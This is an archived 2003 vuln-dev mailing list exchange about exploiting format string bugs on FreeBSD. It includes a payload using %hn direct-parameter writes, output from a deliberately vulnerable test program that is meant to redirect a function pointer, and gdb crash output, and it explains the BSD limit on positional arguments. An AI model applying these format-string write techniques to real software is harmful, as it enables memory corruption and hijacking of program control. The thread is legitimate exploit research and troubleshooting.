Vulnerability Development mailing list archives

Re: Formatstrings on *BSD

From: "The Itch" <itchie () netric org>
Date: Sat, 21 Jun 2003 20:23:48 +0200

You can't use direct popping or writing (%number$x) on *BSD (well only till
8 pops/writes maximum)
I dont know why this behaviour is on BSD, but it is. On linux you can have a
a direct pop/write as far as you wont.

(in your example you used %9$x)

--
-

The Itch
    -- http://www.netric.org

----- Original Message -----
From: "Ingram" <Vail () gmx net>
To: <vuln-dev () securityfocus com>
Sent: Friday, June 20, 2003 10:07 AM
Subject: Re: Formatstrings on *BSD

[%.-16457x%8$hn%.15261x%9$hn] (35)

^---- first question is your input still at %8$x and %9$x on the bsd box?


yep, see here:

uname

FreeBSD

./vuln AAAABBBB%x%x%x%x%x%x%x%x%x

0 0xbfbffccc
1 0xbfbffcd3
helloWorld() = 0x8048770
accessForbidden() = 0x80487a0

before : ptrf() = 0x8048770 (0xbfbffad8)
buffer =
[AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242]

(71)

after : ptrf() = 0x8048770 (0xbfbffad8)
Welcome in "helloWorld"

...
Segmentation fault (core dumped)

^---- second ... what does the bt look like in gdb...


here we go, the fmt seems to corrupt eax

gdb -core vuln.core

GNU gdb 4.18
.
.
.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `vuln'.
Program terminated with signal 11, Segmentation fault.
#0  0x40517d31 in ?? ()
(gdb) bt
#0  0x40517d31 in ?? ()
#1  0x8048805 in ?? ()
#2  0x8048767 in ?? ()
#3  0x8048561 in ?? ()
(gdb) i reg
eax            0x40517d31       1079082289
ecx            0x8049a70        134519408
edx            0x280e9968       672045416
ebx            0x280e8424       672039972
esp            0xbfbffad4       0xbfbffad4
ebp            0xbfbffae0       0xbfbffae0
esi            0x1      1
edi            0x280e9960       672045408
eip            0x40517d31       0x40517d31
eflags         0x10216  66070
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) x/1x $eax
0x40517d31:     Cannot access memory at address 0x40517d31.


kind regards
Ingram

--
+++ GMX - Mail, Messaging & more  http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!

Current thread:

Formatstrings on *BSD Vail (Jun 18)
- Re: Formatstrings on *BSD KF (Jun 18)
- <Possible follow-ups>
- Re: Formatstrings on *BSD Ingram (Jun 21)
  - Re: Formatstrings on *BSD The Itch (Jun 21)